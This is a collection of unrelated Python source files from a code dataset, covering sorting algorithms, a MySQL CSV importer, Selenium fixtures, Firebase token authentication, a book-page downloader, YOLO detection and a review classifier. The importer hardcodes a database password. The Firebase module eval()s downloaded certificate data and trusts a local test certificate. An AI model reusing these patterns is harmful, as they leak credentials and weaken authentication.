{"seq_id":"26644112714","text":"'''\nRadix sort uses counting sort as a stable subroutine to order the elements\nby each digit in turn, starting from the least significant digit.\n'''\n\n\ndef counting_sort_for_radix_sort(A, d, k=10):\n    n = len(A)\n    C = [0 for _ in range(k)]\n    B = [0 for i in range(n)]\n    for i in range(n):\n        C[radix(A[i], d)] += 1\n    for i in range(1, k):\n        C[i] += C[i-1]\n    for i in range(-1, -n-1, -1):\n        B[C[radix(A[i], d)]-1] = A[i]\n        C[radix(A[i], d)] -= 1\n    for i in range(n):\n        A[i] = B[i]\n\n\ndef radix(x, d, k=10):\n    return (x // k ** d) % k\n\n\ndef radix_sort(A):\n    n = len(A)\n    if n > 0 and min(A) >= 0:\n        d = len(str(max(A)))\n        for i in range(d):\n            counting_sort_for_radix_sort(A, i)\n\n\ndef main():\n    A = [329, 457, 657, 839, 436, 720, 355]\n    radix_sort(A)\n    print(A)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Leonid-T/Algorithms","sub_path":"Sorting/Radix sort/radix_sort.py","file_name":"radix_sort.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"16451872184","text":"# -*- coding: utf-8 -*- \n#!/usr/bin/env python\nimport sys\nimport getpass \nimport pymysql\nimport csv\n\n# connect to the MySQL server; mind the host and port!\nconn = pymysql.connect(host='localhost',\n                    port = 3306,\n                    user='cathy77', \n                    password='mjwaw4025', \n                    db='K_COVID19', \n                    charset='utf8')\n\n# create a cursor from the connection\ncursor = conn.cursor()\n\n# list used to check for and drop duplicate cases\nkeyData=[]\nwith open(\"../data/K_COVID19.csv\", 'r') as file:\n    file_read = csv.reader(file)\n\n    col_list = { \n        'region_code' :23,\n        'province' :4,\n        'confirmed_date' : 10,\n        'avg_temp' : 14,\n        'min_temp' : 15,\n        'max_temp' :16,\n        }\n\n    for i,line in enumerate(file_read):\n\n        #Skip first line\n        if not i: \n            continue\n\n        # checking duplicate region_code & checking region_code == \"NULL\"\n        if (line[col_list['confirmed_date']] == \"NULL\") or (line[col_list['region_code']] == \"NULL\"):\n            continue\n        if ([line[col_list['confirmed_date']], line[col_list['region_code']]] in keyData):\n            continue\n        else:\n            data=[]\n            data.append(line[col_list['confirmed_date']])\n            data.append( line[col_list['region_code']])\n            keyData.append(data)\n\n            #make sql data & query\n            sql_data = []\n            #print(line)\n            #\"NULL\" -> None (String -> null)\n            #print(col_list.values())\n            for idx in col_list.values() :\n                if line[idx] == \"NULL\" :\n                    line[idx] = None\n                else:\n                    line[idx] = line[idx].strip()\n\n                sql_data.append(line[idx])\n            #print(sql_data)\n            query = \"\"\"INSERT INTO `WEATHER`(region_code, province, wdate, avg_temp, min_temp, max_temp) VALUES (%s,%s,%s,%s,%s,%s)\"\"\"\n            sql_data = tuple(sql_data)\n            #print(sql_data)\n            #for debug\n            try:\n                cursor.execute(query, sql_data)\n                print(\"[OK] Inserting [%s] to Weather\"%(data))\n            except (pymysql.Error, pymysql.Warning) as e :\n                # print(\"[Error] %s\"%(pymysql.IntegrityError))\n                if e.args[0] == 1062: continue\n                print('[Error] %s | %s'%(line[col_list['region_code']],e))\n                break\n\nconn.commit()\ncursor.close()\n\nprint(len(keyData))","repo_name":"thing-zoo/kcovid19-team-project","sub_path":"1주차/parsing_weather.py","file_name":"parsing_weather.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"33809508687","text":"from selenium import webdriver\nimport pytest\nimport time\n#from .test_login_page import LogIn\nfrom .pages.login_page import LoginPage\nfrom .data import *\n#import uuid\n#import allure\n\ndef pytest_addoption(parser):\n    parser.addoption('--browser_name', action='store', default=\"chrome\",\n                     help=\"Choose browser: chrome or firefox\")\n    parser.addoption('--language', action='store', default='en',\n                     help=\"Choose language: ec, fr, ru, .....\")\n\n\n@pytest.fixture(scope=\"session\") # runs before each session\n#@pytest.fixture(scope=\"package\") \n#@pytest.fixture(scope=\"module\") \n#@pytest.fixture(scope=\"class\") \n#@pytest.fixture(scope=\"function\") # runs before each function\n\ndef browser(request):\n    user_language = request.config.getoption(\"language\")\n    browser_name = request.config.getoption(\"browser_name\")\n    browser = None\n    if browser_name == \"chrome\":\n        print(\"\\n** START chrome browser for test **\")\n        options = webdriver.ChromeOptions()\n        options.add_argument('chrome')\n#        options.add_argument(\"--headless\") # to run without showing the browser, enable this and remove the options.add_argument('chrome') line above\n        options.add_argument('--start-maximized')\n        options.add_argument('--window-size=1080,1080')\n        options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n        browser = webdriver.Chrome(options=options)\n    elif browser_name == \"firefox\":\n        print(\"\\n** START firefox browser for test **\")\n        fp = webdriver.FirefoxProfile()\n        fp.set_preference(\"intl.accept_languages\", user_language)\n        browser = webdriver.Firefox(firefox_profile=fp)\n    else:\n        raise pytest.UsageError(\"--browser_name should be chrome or firefox\")\n    yield browser\n    print(\"\\n** QUIT browser **\")\n    browser.quit()\n\n\n\n@pytest.fixture\ndef login_fixture(browser):\n    # log the user in\n    page = LoginPage(browser, '/login') \n    print('===================LogIn()==========================') \n    page.open()\n    page.logout_user() # log out first if a session is already active\n    page.login_user(*login_password_valid) # log in with valid credentials \n    time.sleep(2)\n","repo_name":"ser888000/bumbleby","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"39195367445","text":"import requests\nimport json\n\n\nclass RecaptchaService:\n\n    def __init__(self, secret):\n        self.secret = secret\n\n    def verify_token(self, *args, **kwargs):\n        try:\n            token = kwargs['token'] if \"token\" 
in kwargs.keys() else None\n response = requests.post(\"https://www.google.com/recaptcha/api/siteverify\", data={\n \"secret\":self.secret,\n \"response\":token\n })\n response = json.loads(response.text).get(\"success\")\n return response\n except Exception as e:\n print(e)\n return False\n","repo_name":"imjayyy/autotrader","sub_path":"autotrader_web/service/recaptcha.py","file_name":"recaptcha.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23554900571","text":"\r\n\"\"\"\r\n\r\nBasic idea:\r\n\tFind the longest non-decreasing sequence of digits that starts that the beginning of the number.\r\n\tIf this sequence is the whole number, then the input was tidy, so output it\r\n\tOtherwise, we find the last digit in the non-decreasing sequence, except that if that digit is repeated in the non-decreasing sequence,\r\n\t\twe walk backwards until we find the first time that digit occurred in the non-decreasing sequence. We then decrease the digit we found\r\n\t\tby one, and set all digits after it to a 9, forming the smallest tidy number smaller than the input.\r\n\tIf the digit we were set to decrease was the leading digit and was a 1, we need to make sure we don't include a leading zero\r\n\r\n\"\"\"\r\n\r\ndef getNumDigits(num):\r\n\t\"\"\"Get the number of digits in an integer num.\r\n\t\tI know that this can be done more easily using a log base 10, but Python's built in log function\r\n\t\thas numerical precision issues and was saying that the log of 1000 was just slightly less than 3,\r\n\t\tand I'm concerned that it would also fail in other cases.\"\"\"\r\n\tnumDigits = 0\r\n\twhile num > 0:\r\n\t\tnum = num // 10\r\n\t\tnumDigits += 1\r\n\treturn numDigits\r\n\r\ndef getDigit(num, pos):\r\n\t\"\"\"Given an integer num, returns the digit at position pos, where position 0 is the ones place\r\n\t\tIf num has fewer digits than pos, raises a ValueError\"\"\"\r\n\tnumDigits = getNumDigits(num)\r\n\tif pos >= numDigits:\r\n\t\traise ValueError(\"Asked for digit in position \" + str(pos) + \", but \" + str(num) + \" only has \" + str(numDigits) + \" digits!\")\r\n\tret = num // (10**pos) # trim off lower digits\r\n\treturn ret % 10 # return the digit that is now in the ones place\r\n\r\ndef getLastTidyDigit(num):\r\n\t\"\"\"Given an integer num, returns the position of the last \"tidy\" digit:\r\n\t\tthe last digit for which the previous digits formed a non-decreasing sequence\"\"\"\r\n\tlastPos = getNumDigits(num) - 1 # the right-most position in the number --> number of digits minus 1 for zero-indexing\r\n\tcurrPos = lastPos - 1 # the leading digit is guaranteed to be tidy, so start checking from the second-to-left\r\n\tprevDigit = getDigit(num, lastPos)\r\n\twhile currPos >= 0:\r\n\t\tcurrDigit = getDigit(num, currPos)\r\n\t\tif currDigit < prevDigit:\r\n\t\t\treturn currPos + 1 # this digit isn't tidy, but the last one was\r\n\t\tprevDigit = currDigit\r\n\t\tcurrPos -= 1\r\n\t# if got to here, the whole number is tidy, so the last tidy digit is the one to the far right\r\n\treturn 0\r\n\r\nnumInputs = int(input())\r\n\r\nfor case in range(1, numInputs + 1):\r\n\tlastNum = int(input())\r\n\tlastTidyDigit = getLastTidyDigit(lastNum)\r\n\tif lastTidyDigit == 0:\r\n\t\t# means that the whole number is tidy, so just output it\r\n\t\tprint(\"Case #\" + str(case) + \": \" + str(lastNum))\r\n\t\tcontinue # move on to the next number\r\n\r\n\t# otherwise, walk backwards from the last tidy digit 
to find the first time it appeared in the non-decreasing sequence\r\n\tnumDigits = getNumDigits(lastNum)\r\n\tfirstAppearence = lastTidyDigit\r\n\tcompareDigit = getDigit(lastNum, firstAppearence)\r\n\twhile firstAppearence < numDigits - 1:\r\n\t\tcurrDigit = getDigit(lastNum, firstAppearence + 1)\r\n\t\tif currDigit == compareDigit:\r\n\t\t\tfirstAppearence += 1\r\n\t\telse:\r\n\t\t\tbreak\r\n\t# if all the digits out to the beginning of the number are the same, firstAppearence will go up to numDigits - 1 (the leading digit),\r\n\t#\tthen exit the loop, so we still get the right answer\r\n\r\n\tif firstAppearence == numDigits - 1:\r\n\t\t# number we're decreasing by one was the leading digit -- it's easier to treat this separately\r\n\t\tout = \"\"\r\n\t\tif compareDigit != 1:\r\n\t\t\t# make sure we don't accidentally include a leading zero\r\n\t\t\tout = str(compareDigit - 1)\r\n\t\tout += \"9\" * (numDigits - 1)\r\n\t\tprint(\"Case #\" + str(case) + \": \" + out)\r\n\t\tcontinue # move on to the next number\r\n\r\n\tleadingDigits = lastNum // (10 ** (firstAppearence + 1)) # the digits to the left of firstAppearence don't change\r\n\tout = str(leadingDigits) + str(compareDigit - 1) # we're guaranteed that compareDigit != 0, since 0 is the smallest digit and so can't be at the end of a non-decreasing sequence\r\n\tout += \"9\" * firstAppearence # all the digits to the right of firstAppearence become 9\r\n\tprint(\"Case #\" + str(case) + \": \" + out)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2202.py","file_name":"2202.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"70023941315","text":"def sortColors(nums):\n    left, right = 0, len(nums) - 1\n    \n    while left <= right:\n        if nums[left]==1:\n            # swap\n            nums[left],nums[right] = nums[right], nums[left]\n            right -= 1\n        else:\n            left += 1\n\n\n# test\nnums = [1, 0, 1, 0, 1, 0,0,0,0]\nsortColors(nums)\nprint(nums) # prints: [0, 0, 0, 0, 0, 0, 1, 1, 1]\n","repo_name":"YidanWWW/Leetcode","sub_path":"Arrays and String/TwoPointers/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"25794957598","text":"import re\n\nfrom setuptools import find_namespace_packages, setup\n\nwith open(\"src/panoramic/cli/__version__.py\", encoding=\"utf8\") as f:\n    version = re.search(r'__version__ = \"(.*?)\"', f.read()).group(1)  # type: ignore\n\nTEST_REQUIRES = [\n    \"pytest>=5.3.5\",\n    \"responses>=0.10.14\",\n    \"freezegun>=0.3.15\",\n    \"typing_extensions>=3.7.4\",\n]\nDEV_REQUIRES = [\"mypy>=0.790\", \"flake8>=3.8.3\", \"black==20.8b0\", \"pre-commit==2.9.3\"]\n\nsetup(\n    name=\"pano\",\n    description=\"Panoramic Command Line Tool\",\n    url=\"https://github.com/panoramichq/panoramic-cli\",\n    project_urls={\"Source Code\": \"https://github.com/panoramichq/panoramic-cli\"},\n    author=\"Panoramic\",\n    maintainer=\"Panoramic\",\n    version=version,\n    long_description=open(\"README.md\").read(),\n    long_description_content_type=\"text/markdown\",\n    packages=find_namespace_packages(where='src', include=[\"panoramic.*\"]),\n    package_dir={\"\": \"src\"},\n    python_requires=\">=3.6\",\n    classifiers=[\n        \"Development Status :: 5 - Production/Stable\",\n        \"License :: OSI Approved\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Programming Language :: Python :: 3\",\n        \"Programming Language :: Python :: 3.7\",\n        \"Programming Language :: Python :: 3.8\",\n    ],\n    install_requires=[\n        'click>=7.1.2',\n        'colorama>=0.4.3',\n        'PyYAML==5.3.1',\n        'packaging>=20.4',\n        'tqdm==4.47.0',\n        'python-dotenv>=0.14.0',\n        'jsonschema>=3.0',\n        'requests>=2.18.0',\n        \"importlib_resources ; python_version<'3.7'\",\n        \"analytics-python==1.2.9\",\n        \"sqlalchemy>=1.3.19\",\n        \"snowflake-sqlalchemy==1.2.3\",\n        \"pybigquery==0.4.15\",\n        \"schematics==2.1.0\",\n        \"pydash==4.7.4\",\n        \"Unidecode==1.0.23\",\n        \"networkx==2.3\",\n        \"xxhash==1.3.0\",\n        \"antlr4-python3-runtime==4.8\",\n        \"pydantic==1.5.1\",\n        \"docstring_parser==0.7.3\",\n    ],\n    extras_require={\"tests\": TEST_REQUIRES, \"dev\": TEST_REQUIRES + DEV_REQUIRES},\n    include_package_data=True,\n    entry_points={\"console_scripts\": [\"pano=panoramic.cli:cli\"]},\n)\n","repo_name":"panoramichq/panoramic-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
{"seq_id":"5696853936","text":"import sys\n\nn,m = map(int,sys.stdin.readline().split())\ntime = list(map(int,sys.stdin.readline().split()))\n\nstart = max(time)\nend = sum(time) # maximum possible answer\nresult = 0\nwhile start <= end :\n    mid = (start+end)//2\n    count = 1\n    total = time[0]  # renamed from 'sum' to avoid shadowing the builtin used above\n    for i in range(1,n):\n        if mid < total + time[i] :\n            total = time[i]\n            count += 1\n        else : total += time[i]\n    if count > m :\n        start = mid +1\n    else : \n        result = mid\n        end = mid - 1\n    \nprint(result)","repo_name":"wnsrb003/backjunTEST","sub_path":"6월/영지문제-15번.py","file_name":"영지문제-15번.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"3117149443","text":"from esloq.models import EsloqUser\nfrom rest_framework import authentication\nfrom rest_framework import exceptions\nfrom cryptography.exceptions import InvalidSignature\nimport jwt\nfrom cryptography.x509 import load_pem_x509_certificate\nfrom cryptography.hazmat.backends import default_backend\nimport urllib.request\n\nclass FirebaseAuthentication(authentication.BaseAuthentication):\n    \"\"\"\n    Returns the authenticated user if the user provided a valid Firebase \n    authentication token in the Authorization header. The header must look like this:\n    Authorization: Bearer <token>\n    \"\"\"\n    def authenticate(self, request):\n        auth_header = request.META.get('HTTP_AUTHORIZATION') # get the Authorization request header\n\n        if not auth_header: # no token passed in request headers\n            return None # authentication did not succeed\n\n        try:\n            token = auth_header.split(\"Bearer \")[1]\n            idinfo = _verifyidtoken(token)\n        except IndexError as e:\n            return None # authentication did not succeed\n        except InvalidSignature as e:\n            return None\n\n        try:\n            firebase_id = idinfo['sub']\n            user = EsloqUser.objects.get(firebase_id=firebase_id) # get the user\n        except EsloqUser.DoesNotExist:\n            return None\n            # raise exceptions.AuthenticationFailed('No such user') # raise exception if user does not exist \n\n        return (user, None) # authentication successful\n\ndef _verifyidtoken(token):\n    # Open file containing Firebase's certificates\n    with open('esloq/firebase_certs.txt', 'r') as f:\n        data = f.read()\n    certs = eval(data)  # the certs file stores a Python dict literal; this assumes the file is trusted\n    with open('esloq/tests/cert.pem', 'r') as f:\n        test_cert = f.read()\n    certs[\"0\"] = test_cert\n    jwt_header = jwt.get_unverified_header(token)\n\n    # Try to extract certificate, if it is not present, download the new certificates.\n    try:\n        certs[jwt_header[\"kid\"]]\n    except KeyError:\n        url = \"https://www.googleapis.com/robot/v1/metadata/x509/securetoken@system.gserviceaccount.com\"\n        with urllib.request.urlopen(url) as response:\n            html = response.read()\n        with open('esloq/firebase_certs.txt', 'wb') as f:\n            f.write(html)\n        certs = eval(html)\n\n    certificate_text = bytes(certs[jwt_header[\"kid\"]], \"ASCII\")\n    public_key = load_pem_x509_certificate(certificate_text, default_backend()).public_key()\n\n    try:\n        verified_jwt = jwt.decode(token, public_key, audience='decoded-totem-95010', issuer='https://securetoken.google.com/decoded-totem-95010', algorithms=['RS256'], leeway=10)\n        return verified_jwt\n    except Exception:\n        raise InvalidSignature(\"Invalid authorization token.\")\n","repo_name":"sdeleers/esloq","sub_path":"webserver/esloq/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"33136562149","text":"import requests\nimport os\n\n\nclass TermSpider:\n    def __init__(self, book_list):\n        self.url_template = \"https://www.termonline.cn/tmbook/1/{}/pages/{}.jpg\"\n        self.book_list = book_list\n        self.headers = {\n            \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"}\n        self.base_dir = \"./books\"\n\n    def download(self, book_name):\n        for i in range(1, 1000):\n            try:\n                url = self.url_template.format(book_name, i)\n                print(url)\n                if not os.path.exists(os.path.join(self.base_dir, book_name)):\n                    os.mkdir(os.path.join(self.base_dir, book_name))\n                r = requests.get(url, headers=self.headers, stream=True)\n                # stream the download so large page images are not held in memory\n                save_file_name = os.path.join(self.base_dir, book_name, \"{}.jpg\".format(i))\n                with open(save_file_name, mode=\"wb\") as f:\n                    if r.status_code == 200:\n                        f.write(r.content)\n                    print(\"download finished\")\n            except Exception as e:\n                print(e)\n                break\n\n    def run(self):\n        if not os.path.exists(self.base_dir):\n            os.mkdir(self.base_dir)\n        for book_name in self.book_list:\n            self.download(book_name)\n\n\nif __name__ == '__main__':\n    book_list = [\"农学名词-第一版-1993\",\n                 \"动物学名词-第一版-1996\",\n                 \"土壤学名词-第一版-1998\",\n                 
\"医学名词-第一版\"\n ]\n spider = TermSpider(book_list)\n spider.run()\n # url = \"https://www.termonline.cn/tmbook/1/%E5%8A%A8%E7%89%A9%E5%AD%A6%E5%90%8D%E8%AF%8D-%E7%AC%AC%E4%B8%80%E7%89%88-1996/pages/4.jpg\"\n # book_name = \"动物学名词-第一版-1996\"\n # page_num = 4\n\n # spider.download_book(url, book_name, page_num)\n","repo_name":"kenzzuli/hm_15","sub_path":"spider/exercise/term_online_books/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35370746965","text":"import cv2\r\nimport numpy as np\r\n\r\n# Load Yolo\r\nnet = cv2.dnn.readNet(\"yolov3.weights\", \"yolov3.cfg\")\r\nclasses = []\r\nconsidered_classes = ['car','bus','train','truck','bicycle','motorbike']\r\n\r\nwith open(\"coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\r\n\r\n# cap = cv2.VideoCapture('../object_detection/test_videos/video_000.mp4') \r\ncap = cv2.VideoCapture('/home/howdrive/Videos/20201101_142132.mp4') \r\nwhile(True):\r\n ret,all_img=cap.read()\r\n\r\n # Loading image\r\n # cv2.imwrite(\"frame_shape.jpg\",img)\r\n # img = all_img\r\n img = all_img[380:800,:]\r\n\r\n # img = all_img[110:300,600:1023]\r\n\r\n # img = cv2.resize(img, None, fx=0.4, fy=0.4)\r\n height, width, channels = img.shape\r\n\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(img, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n # Showing informations on the screen\r\n class_ids = []\r\n confidences = []\r\n boxes = []\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5 and classes[class_id] in considered_classes:\r\n # Object detected\r\n center_x = int(detection[0] * width)\r\n center_y = int(detection[1] * height)\r\n w = int(detection[2] * width)\r\n h = int(detection[3] * height)\r\n\r\n # Rectangle coordinates\r\n x = int(center_x - w / 2)\r\n y = int(center_y - h / 2)\r\n\r\n boxes.append([x, y, w, h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\r\n # print(indexes)\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n for i in range(len(boxes)):\r\n if i in indexes:\r\n x, y, w, h = boxes[i]\r\n label = str(classes[class_ids[i]])\r\n color = colors[class_ids[i]]\r\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\r\n cv2.putText(img, label, (x, y + 30), font, 3, color, 3)\r\n\r\n\r\n cv2.imshow(\"Image\", img)\r\n k = cv2.waitKey(50) & 0xff\r\n if k == 27: # 'esc' key has been pressed, exit program.\r\n break\r\n\r\ncv2.destroyAllWindows()","repo_name":"CharZakaria/Intersection-Maneuver-reasoning","sub_path":"yolo_object_detection_video.py","file_name":"yolo_object_detection_video.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11608553957","text":"import os\r\nimport pickle\r\nimport nltk\r\nimport numpy as np\r\n\r\nnltk.download('punkt')\r\nnltk.download('stopwords')\r\nnltk.download('maxent_treebank_pos_tagger')\r\nnltk.download('averaged_perceptron_tagger')\r\n\r\ncategories = [\"Books_5\", 
\"Clothing_Shoes_and_Jewelry_5\", \"Electronics_5\", \"Home_and_Kitchen_5\", \"Kindle_Store_5\",\r\n \"Movies_and_TV_5\", \"Pet_Supplies_5\", \"Sports_and_Outdoors_5\", \"Tools_and_Home_Improvement_5\",\r\n \"Toys_and_Games_5\"]\r\n\r\ncategories_str = \"Clothing_Shoes_and_Jewelry_5\"\r\nfor i in range(1, len(categories)):\r\n categories_str += \", \" + categories[i]\r\n\r\n\r\ndef countvectorize(statement):\r\n vectorizer = pickle.load(open(os.path.join(\"models\", \"vectorizer.pk\"), 'rb'))\r\n statement = vectorizer.transform(statement).toarray()\r\n return statement\r\n\r\n\r\ndef onehotencode(rating, product_category, X):\r\n le_1 = pickle.load(open(os.path.join(\"models\", \"le_1.pk\"), 'rb'))\r\n le_3 = pickle.load(open(os.path.join(\"models\", \"le_3.pk\"), 'rb'))\r\n\r\n col_trans_a = pickle.load(open(os.path.join(\"models\", \"col_trans_a.pk\"), 'rb'))\r\n col_trans_c = pickle.load(open(os.path.join(\"models\", \"col_trans_c.pk\"), 'rb'))\r\n\r\n w = 2\r\n h = 1\r\n column_label_encoding = [[0 for x in range(w)] for y in range(h)]\r\n\r\n for i in range(0, 1):\r\n column_label_encoding[i][0] = rating\r\n\r\n column_label_encoding[i][1] = product_category\r\n\r\n column_label_encoding = np.array(column_label_encoding)\r\n\r\n column_label_encoding[:, 0] = le_3.transform(column_label_encoding[:, 0])\r\n column_label_encoding[:, 1] = le_1.transform(column_label_encoding[:, 1])\r\n\r\n column_label_encoding = col_trans_a.transform(column_label_encoding)\r\n try:\r\n column_label_encoding = column_label_encoding.toarray()\r\n except:\r\n pass\r\n column_label_encoding = column_label_encoding.astype(np.float64)\r\n\r\n\r\n try:\r\n column_label_encoding = column_label_encoding.toarray()\r\n except:\r\n\r\n pass\r\n column_label_encoding = column_label_encoding.astype(np.float64)\r\n\r\n column_label_encoding = col_trans_c.transform(column_label_encoding)\r\n try:\r\n column_label_encoding = column_label_encoding.toarray()\r\n except:\r\n pass\r\n column_label_encoding = column_label_encoding.astype(np.float64)\r\n\r\n X = np.append(X, column_label_encoding, axis=1)\r\n print(len(X))\r\n return X\r\n\r\n\r\ndef get_POS_Tagging(sentence_to_tag):\r\n total_verb_count = 0\r\n total_noun_count = 0\r\n\r\n pos_tags = []\r\n\r\n text = nltk.word_tokenize(sentence_to_tag)\r\n tagged_words_list = (nltk.pos_tag(text))\r\n\r\n for lis in tagged_words_list:\r\n pos_tags.append(lis[1])\r\n\r\n for tag in pos_tags:\r\n if tag in ['NOUN','NNP','NN','NUM','NNS','NP','NNPS']:\r\n total_noun_count += 1\r\n elif tag in ['VERB','VB','VBN','VBD','VBZ','VBG','VBP']:\r\n total_verb_count += 1\r\n else:\r\n continue\r\n\r\n if total_noun_count >= total_verb_count:\r\n sentence_to_tag = 'T'\r\n else:\r\n sentence_to_tag = 'F'\r\n\r\n return sentence_to_tag\r\n\r\n\r\ndef postag(sentence, X):\r\n width = 2\r\n height = 1\r\n\r\n text_pos_tag = []\r\n for i in range(height):\r\n row_list = []\r\n for j in range(width):\r\n row_list.append(0)\r\n text_pos_tag.append(row_list)\r\n\r\n pos_tagged_sentence = get_POS_Tagging(sentence)\r\n\r\n if pos_tagged_sentence == 'T':\r\n text_pos_tag[0][0] = 1\r\n text_pos_tag[0][1] = 0\r\n else:\r\n text_pos_tag[0][0] = 0\r\n text_pos_tag[0][1] = 1\r\n\r\n X = np.append(X, text_pos_tag, axis=1)\r\n return X\r\n\r\n\r\ndef classify(X):\r\n rfc = pickle.load(open(os.path.join(\"models\", \"randomforest.pk\"), 'rb'))\r\n return rfc.predict(X)\r\n\r\n\r\ndef get_result(statement, rating, product_category):\r\n X = countvectorize([statement])\r\n X = postag(statement, X)\r\n X = 
onehotencode(rating, product_category, X)\r\n\r\n X = classify(X)\r\n return X\r\n\r\n\r\ndef test_input(product_rating, product_category):\r\n x = True\r\n y = True\r\n z = True\r\n\r\n if product_rating != '1' and product_rating != '2' and product_rating != '3' and product_rating != '4' and product_rating != '5':\r\n print()\r\n print()\r\n print(\"\\nError : Rating of a product must be from 1 to 5.\")\r\n print(\"\\nPlease try again\")\r\n\r\n x = False\r\n\r\n if product_category not in categories:\r\n print()\r\n print()\r\n print(\"\\nError : Categories must be one of the following : \\n\" + categories_str)\r\n print(\"\\nPlease try again\")\r\n\r\n z = False\r\n\r\n return [x, y, z]\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n review_text = input(\"\\nPlease type in your review : \")\r\n\r\n product_rating = \"\"\r\n\r\n product_category = \"\"\r\n\r\n input_ar = [False, False, False]\r\n\r\n while (True):\r\n if not input_ar[0]:\r\n product_rating = input(\"\\nPlease enter your rating from 1 to 5 for the product : \")\r\n product_rating = '3'\r\n\r\n if not input_ar[2]:\r\n product_category = 'Home_and_Kitchen_5'\r\n input_ar = test_input(product_rating, product_category)\r\n\r\n if input_ar == [True, True, True]:\r\n break\r\n\r\n answer = get_result(review_text, product_rating, product_category)\r\n\r\n if answer == 1:\r\n print(\"This is an Actual review\")\r\n\r\n else:\r\n print(\"This is a Fake review\")\r\n\r\n\r\n","repo_name":"dmalhot6/cse573_fake_review_detection","sub_path":"test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26957064628","text":"from collections import ChainMap\nfrom typing import (\n TYPE_CHECKING,\n Callable,\n Generic,\n Iterable,\n List,\n Mapping,\n MutableMapping,\n NewType,\n Sequence,\n Set,\n TypeVar,\n)\nfrom unittest.mock import Mock\n\nimport pytest\n\nif TYPE_CHECKING:\n from in_n_out import Store\n\nT = TypeVar(\"T\")\n\n\nclass G(Generic[T]):\n ...\n\n\nnt = NewType(\"nt\", int)\nNON_SUBCLASSABLE_TYPES = [\"hi\", nt, List[nt], T, Callable[[int], str], G[int]]\nSUBCLASS_PAIRS = [\n (list, Sequence),\n (tuple, Sequence),\n (dict, Mapping),\n (set, Set),\n (list, Iterable),\n (ChainMap, MutableMapping),\n]\n\n\n@pytest.mark.parametrize(\"type_\", NON_SUBCLASSABLE_TYPES)\n@pytest.mark.parametrize(\"mode\", [\"provider\", \"processor\"])\ndef test_non_standard_types(test_store: \"Store\", type_, mode) -> None:\n mock = Mock(return_value=1)\n if mode == \"provider\":\n test_store.register_provider(mock, type_)\n assert test_store.provide(type_) == 1\n mock.assert_called_once()\n else:\n test_store.register_processor(mock, type_)\n test_store.process(2, type_hint=type_)\n mock.assert_called_once_with(2)\n\n\ndef test_provider_type_error(test_store: \"Store\") -> None:\n with pytest.raises(TypeError, match=\"cannot be used as a provider hint\"):\n test_store.register_provider(lambda: 1, set())\n with pytest.raises(TypeError, match=\"cannot be used as a processor hint\"):\n test_store.register_processor(lambda x: None, set())\n\n\n@pytest.mark.parametrize(\"sub, sup\", SUBCLASS_PAIRS)\n@pytest.mark.parametrize(\"mode\", [\"provider\", \"processor\"])\ndef test_subclass_pairs(test_store: \"Store\", sub, sup, mode) -> None:\n mock = Mock(return_value=1)\n if mode == \"provider\":\n test_store.register_provider(mock, sup)\n assert test_store.provide(sub) == 1\n mock.assert_called_once()\n else:\n 
